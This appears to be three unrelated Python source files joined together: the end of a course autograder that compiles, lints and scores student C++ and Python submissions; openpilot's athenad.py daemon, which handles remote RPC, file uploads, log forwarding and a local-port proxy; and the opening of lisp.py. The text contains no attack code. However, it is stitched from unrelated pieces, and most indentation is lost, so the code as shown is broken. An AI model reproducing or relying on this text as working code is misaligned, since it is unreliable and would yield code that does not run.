cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
return T.stderr
def compile_separate(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_separate, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.realfilename,cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
def compile(self,prefix):
if not hasattr(self,'lintoptions'):
self.lintoptions = STDLINT
try:
with open(self.realfilename) as f:
self.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile, {self.realfilename} not found.")
self.executable = prefix+str(random.randint(1000,100000))
new_source_file = self.executable + ".cpp"
with open(new_source_file,'w') as f:
f.write(self.file_contents)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',new_source_file,"-o",self.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(new_source_file)
self.code_metrics = code_analysis_cpp(self.realfilename,self.lintoptions)
return (T.returncode,T.stderr)
def compile_and_run(self,prefix):
compile(self,prefix)
try:
T = sub.run([self.executable],stdout=sub.PIPE,stderr=sub.PIPE,timeout=1,universal_newlines=True)
except Exception as e:
safe_remove(self.executable)
raise unittest.SkipTest("Failed to run.\n"+str(e))
self.output = T.stdout
self.errors = T.stderr
def bracket_check(self):
"brackets. check for brackets"
bracket_count = self.code_metrics['brackets']
if bracket_count:
self.fail(bracket_msg.format(bracket_count))
def test_includes(self):
"libraries. check the included libraries are allowed"
includes = get_includes(self.file_contents)
self.msgs.append('included libraries : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid includes: {}'.format(" ".join(x for x in invalid_includes)))
def test_imports(self):
"libraries. check the imported modules are allowed"
includes = get_python_imports(self.file_contents)
self.msgs.append('imported modules : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid imports: {}'.format(" ".join(x for x in invalid_includes)))
def test_libraries(self):
"libraries. check the included libraries/modules are allowed"
if self.program.endswith('cpp'):
test_includes(self)
else:
test_imports(self)
def test_authors(self):
"authors. check on authors' emails identified"
authors = get_authors(self.file_contents, progtype(self.realfilename))
self.authors = authors[:]
self.msgs.append('authors : {}\n'.format(" ".join(authors)
if authors else AUTHWARN))
if len(authors)==0:
self.fail('No authors found in your document.')
elif len(authors) > self.authorlimit:
        self.fail(f'Author limit {self.authorlimit} exceeded.')
def test_pystyle(self):
"style. python code style and analysis"
proc_pycodestyle = sub.run(['pycodestyle', self.realfilename], stdout=sub.PIPE)
prob = False
if proc_pycodestyle.returncode:
prob = proc_pycodestyle.stdout.decode().rsplit(" ", 1)[-1].strip()
self.msgs.append("pycodestyle check: {}\n".format("{} problems".format(
len(proc_pycodestyle.stdout.decode().splitlines())) if prob else "ok"))
proc_pylint = sub.run(
['pylint', self.realfilename], stdout=sub.PIPE,stderr=sub.PIPE)
pylint_report = proc_pylint.stdout.decode().splitlines()
if len(pylint_report)<2:
logging.error('bad pylint_report'+proc_pylint.stdout.decode())
pylint_score = 0
elif "previous" in pylint_report[-2]:
pylint_score=pylint_report[-2].split()[6]
else:
pylint_score = pylint_report[-2].split()[-1]
self.msgs.append("pylint score : {}\n".format(pylint_score))
code_metrics = code_analysis_py(self.file_contents)
self.msgs.append(code_size_report(code_metrics, self.refcode))
comments = 0
for line in self.file_contents.splitlines():
if '#' in line:
comments += 1
self.msgs.append("comments : {}\n".format(comments))
def test_cppstyle(self):
"style. C++ code style and analysis"
comments = 0
for line in self.file_contents.splitlines():
if '//' in line:
comments += 1
cm = self.code_metrics
if cm['errors']:
numerrors=sum(len(x) for x in cm['errors'].values())
self.msgs.append(f"cpplint : {numerrors} problems")
cpplint_call_list = [
'cpplint', '--filter=' + ','.join(self.lintoptions), self.__doc__
]
self.msgs.append(' [using {}]\n\n'.format(' '.join(cpplint_call_list)))
for e in cm['errors']:
for x in cm['errors'][e]:
self.msgs.append(' line {} ({}): {}'.format(*x))
else:
self.msgs.append("cpplint : ok")
self.msgs.append(f"astyle : {cm['astyle']:.1%} code unchanged.")
self.msgs.append(code_size_report(cm, self.refcode))
self.msgs.append(f"comments : {comments}")
stylegrade(self)
def stylegrade(cls):
cls.stylemax=cls.Points['style']
try:
D = cls.code_metrics['errors']
except Exception as e:
cls.fail(cls,f'Something went wrong: {e}')
cpplint_count= sum(len(D[x]) for x in D)
as_grade = 5*cls.code_metrics['astyle']
cls.msgs.append(f"astyle[max 5] {as_grade:.2f}")
lint_grade = max(0, 5-cpplint_count)
cls.msgs.append(f"cpplint[max 5] {lint_grade} (1 point deduction for each problem)")
cls.Points['style'] = round(as_grade + lint_grade,2)
cls.msgs.append(f"overall style grade[max 10] {cls.Points['style']:.2f}")
def test_style(self):
"style. test program style"
if self.program.endswith('cpp'):
test_cppstyle(self)
elif self.program.endswith('py'):
test_pystyle(self)
else:
self.msgs.append(f'Dont now how to check style of {self.program}')
def read_file(filename):
"read the contents of filename into string"
filehand = open(filename)
contents = filehand.read()
filehand.close()
return contents
def read_file_for_cpplint(filename):
"read the contents of filename into list of strings"
filehand = open(filename)
contents = filehand.read()
filehand.close()
lines = contents.splitlines()
if contents.endswith('\n'):
lines.append('')
return lines
def make_grades(gradesummary,cls,special_str="",spec_grade=0):
grade = 0
grade_report = special_str
grade_report += "\n"
for test in sorted(cls.Points):
if cls.Points[test]==int(cls.Points[test]):
grade_report += f" {test}({cls.Points[test]} / {cls.MaxPoints[test]})\n"
else:
grade_report += f" {test}({cls.Points[test]:.2f} / {cls.MaxPoints[test]})\n"
grade += cls.Points[test]
grade_report += "\n"
if hasattr(cls,"Penalty"):
for test in cls.Penalty:
if test in gradesummary['fail']:
grade_report += "Penalty for failed test {}: {}\n".format(test,cls.Penalty[test])
grade -= cls.Penalty[test]
grade = max(grade+spec_grade,0)
grade_report += f"\nGrade: {grade:5.2f}"
return grade, grade_report
def code_analysis_cpp(program_filename,lintoptions):
ignore_lint = [x[1:] for x in lintoptions if x.startswith('-')]
Errors = {}
def error_fcn(filename,line_number,lint_type,level,message):
category,subcategory = lint_type.split('/')
if category not in Errors:
Errors[category]=[]
Errors[category].append( (line_number,lint_type,message) )
lines = read_file_for_cpplint(program_filename)
cpplint.RemoveMultiLineComments(program_filename,lines,error_fcn)
clean_lines = cpplint.CleansedLines(lines)
cpplint.ProcessFileData(program_filename,'cpp',lines,error_fcn)
the_lines = [x for x in clean_lines.lines if x]
num_lines=len(the_lines)
num_words = sum(len(x.split()) for x in the_lines)
num_brackets = sum(x.count('[') for x in the_lines)
num_brackets += sum(x.count('<:') for x in the_lines)
num_brackets -= sum(x.count('argv[') for x in the_lines)
original = read_file(program_filename)
proc_astyle = sub.run(
['astyle', *ASTYLE_OPTIONS],
input=original.encode(),
stdout=sub.PIPE,
stderr=sub.PIPE)
if proc_astyle.returncode:
unchanged='error'
else:
original = original.splitlines()
newprog = proc_astyle.stdout.decode().splitlines()
matcher = difflib.SequenceMatcher()
matcher.set_seqs(original, newprog)
unchanged = matcher.ratio()
RealErrors={}
for e in Errors:
RealErrors[e]=[]
for x in Errors[e][:3]:
ignore=False
for s in ignore_lint:
if x[1] in s:
                    ignore=True
if not ignore:
RealErrors[e].append(x)
if not RealErrors[e]:
del RealErrors[e]
return {'brackets':num_brackets,
'lines': num_lines,
'words': num_words,
'errors':RealErrors,
'astyle':unchanged}
def isstring(x):
x=x.strip()
if not x:
return True
elif x.startswith('#'):
return True
elif x.startswith('"""') and x.endswith('"""'):
return True
elif x.startswith("'''") and x.endswith("'''"):
return True
elif x.startswith('"') and x.endswith('"'):
return True
elif x.startswith("'") and x.endswith("'"):
return True
def code_analysis_py(program_contents):
"count lines and words in python"
# remove docstrings
for search_str in ('\"\"\"[^\"]*\"\"\"',"\'\'\'[^\']*\'\'\'"):
for x in re.findall(search_str,program_contents,flags=re.MULTILINE|re.DOTALL):
program_contents = program_contents.replace(x,'')
srclines=program_contents.splitlines()
# remove single line strings.
srclines = [x for x in program_contents.splitlines() if not isstring(x)]
src ="\n".join(srclines)
#print(src)
return {'lines': len(src.splitlines()), 'words': len(src.split())}
pylint_options=["--enable=all","--reports=yes","--persistent=no",
"--msg-template='{category:10s}:{line:3d},{column:2d}: {msg} ({symbol})'"]
def pylint_check(program_name):
process = sub.run(['pylint',program_name,*pylint_options],
stdout=sub.PIPE,universal_newlines=True)
out_str = process.stdout
for scoreline in out_str.splitlines()[-4:]:
try:
            score = float(re.search(r'Your code has been rated at ([\d.]*)/10', scoreline).groups()[0])
return score, out_str
except:
pass
raise ValueError('could not get your pylint score')
def pycodestyle_check(filename):
"run pycodestyle, return #errors and error string"
pycodestyle_res = io.StringIO()
sys.stdout = pycodestyle_res
pycodestyle_errors = pycodestyle.Checker(filename).check_all()
sys.stdout = sys.__stdout__
res = pycodestyle_res.getvalue()
return pycodestyle_errors,res
def progtype(program):
"which type, cpp or py"
try:
_, program_type = program.split('.')
except:
return "sh"
return program_type
def get_includes(file_contents):
"get included libraries in C/C++"
includes = set()
for line in file_contents.lower().splitlines():
text = line.strip()
search_str = r"#include\s*<(.*)>"
matches = re.match(search_str, text)
if matches:
includes.add(matches.group(1))
matches = re.match("#include \"(.*)\"", text)
if matches:
includes.add(matches.group(1))
return includes
def get_python_imports(file_contents):
"get the imports of file_contents as a set"
try:
instructions = dis.get_instructions(file_contents)
imports = [__ for __ in instructions if 'IMPORT' in __.opname]
except:
return {'ERROR PROCESSING PYTHON SCRIPT'}
grouped = set()
for instr in imports:
if instr.opname == "IMPORT_NAME":
grouped.add(instr.argval)
return grouped
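def _example_get_python_imports():
    # Hypothetical check (not part of the grader): dis compiles the source
    # string and IMPORT_NAME instructions reveal the imported modules.
    assert get_python_imports("import os\nimport sys") == {'os', 'sys'}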
def get_authors(file_contents, ptype,buedu=True):
"""get the authors in file_contents"""
authors = []
if ptype == 'json':
A = json.loads(file_contents)
return A.get('authors',[])
for line in file_contents.lower().splitlines():
if line.startswith(COMMENT_STRING[ptype]) and "copyright" in line:
try:
_, email = line.strip().rsplit(" ", 1)
if email.endswith('@bu.edu'):
authors.append(email if buedu else email.split("@")[0])
elif email.endswith('\r'):
authors.append('DONT_USE_WINDOWS_ENDLINES')
except:
pass
return authors
def check_program(testclass,course=None,email=None,versioninfo=None,theprog=None):
"""return any errors as a list of strings"""
errors = []
passed = []
gradesummary = {'pass': [], 'fail': []}
testclass.realfilename = theprog
if hasattr(testclass, "setUpClass"):
try:
testclass.setUpClass()
except Exception as e:
return f"{testclass} setup fail {e}",0
loader = unittest.loader.TestLoader()
tests = loader.loadTestsFromTestCase(testclass)
def f(test,order):
testname=test.shortDescription().split('.')[0]
i = order.index(testname)
return i
if hasattr(testclass,"testorder"):
alltests = sorted(tests,key=lambda x: f(x,testclass.testorder))
else:
alltests = sorted(tests, key=lambda x: x.shortDescription())
for test in alltests:
#if testclass.program.endswith('py') and test.shortDescription().startswith('bracket'):
# continue
if DEBUG: print('running test:' ,test.shortDescription())
run = test.run()
if run.wasSuccessful():
thetest = test.shortDescription().split('.')[0]
if thetest != 'style':
passed.append('{}\n'.format(test.shortDescription()))
gradesummary['pass'].append(test.shortDescription().split('.')[0])
else:
err = f'\n{test.shortDescription()}\n'
for testmsg, res in run.failures + run.errors:
                casetext = re.search(r".*CASE=(.*)\)", str(testmsg))
if casetext:
err += "\nCASE: {}\n".format(casetext.group(1)[1:-1])
if 'AssertionError:' in res:
_, msg = res.split('AssertionError: ')
else:
msg = res
err += msg
errors.append(err)
gradesummary['fail'].append(test.shortDescription().split('.')[0])
if hasattr(testclass, "tearDownClass"):
testclass.tearDownClass()
if 'style' in testclass.Points:
if testclass.stylemax != testclass.Points['style']:
errors.append('style errors')
else:
gradesummary['pass'].append('style')
grade, grade_report = make_grades(gradesummary,testclass)
msg = report_msg.format(info="\n".join(testclass.msgs),
passed=''.join(passed) if passed else "None",
failed=''.join(errors) if errors else "None",
grade = grade_report,
prog = testclass.__doc__,
version = versioninfo or "",
email =email or "",
course=course)
return msg, grade
EMPTYGRADE = {'pass': [], 'fail': []}
def errors_msg(errors):
"format error message"
msg = '-----------------errors found--------------\n'
for testmsg in errors:
msg += testmsg + "\n-------\n"
return msg
SIZE_REPORT_TEMPLATE = """lines of code : {}, {:4.0%} of reference
tokens in code : {}, {:4.0%} of reference
"""
def code_size_report(submitted_code, reference_code):
"generate message about code size"
return SIZE_REPORT_TEMPLATE.format(
submitted_code['lines'],
submitted_code['lines'] / reference_code['lines'],
submitted_code['words'],
submitted_code['words'] / reference_code['words'])
def pyshell(Parms, q):
    summary, results, gradesummary = overallpy(**Parms)
    q.put([summary, results, gradesummary])

def check_program_shell(Parms, q):
    q.put(check_program(**Parms))
def case_sensitive():
"is the file system case sensitive?"
fname = f"testing_{random.randint(1_000_000,2_000_000)}"
os.mkdir(fname)
    try:
        os.mkdir(fname.upper())
        os.rmdir(fname.upper())
    except OSError:
        # mkdir of the upper-cased name collided with the original
        # directory, so the file system is case insensitive
        return False
    finally:
        os.rmdir(fname)
return True
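# Usage sketch (illustrative, added): a grader can warn about filename-case
# collisions up front, e.g.:
#   if not case_sensitive(): print("case-insensitive filesystem detected")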
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
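# Note (illustrative, added): the three defaults right-align onto the last
# three fields, so UploadItem(path, url, headers, created_at, id) starts
# with retry_count=0, current=False, progress=0.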
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
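# Illustrative example (added; the paths are hypothetical): with prefix
# "2021-08", a directory "2021-08-01--10-00-00/" matches via
# rel_path.startswith(prefix); with prefix "2021-08-01--10-00-00/rlog" the
# directory matches the reverse test prefix.startswith(rel_path), and the
# recursion then filters the files inside it.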
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
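# Note (illustrative, added): the id is a SHA-1 over the item's string form
# (created_at included), giving each enqueued item a unique handle that
# cancelUpload() can reference later.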
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
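# Note (illustrative, added): the socketpair acts as an in-process signal:
# when ws_proxy_recv exits it closes ssock, which makes csock readable and
# wakes the select() in ws_proxy_send so both directions shut down together.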
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
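# Note (illustrative, added): the xattr stores the last send time in 4
# bytes; log_handler later writes LOG_ATTR_VALUE_MAX_UNIX_TIME (2**31 - 1)
# after a confirmed upload, marking the log as permanently sent so it is
# never re-queued here.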
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
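# Hedged example (helper added for illustration, not part of the daemon):
# backoff() draws from [0, min(128, 2**retries)), so successive retry waits
# grow exponentially with jitter and cap at 128 seconds.
def _example_backoff_bounds(max_retries=10):
    return [min(128, int(2 ** r)) for r in range(max_retries)]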
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import int
from builtins import range
from builtins import object
from past.utils import old_div
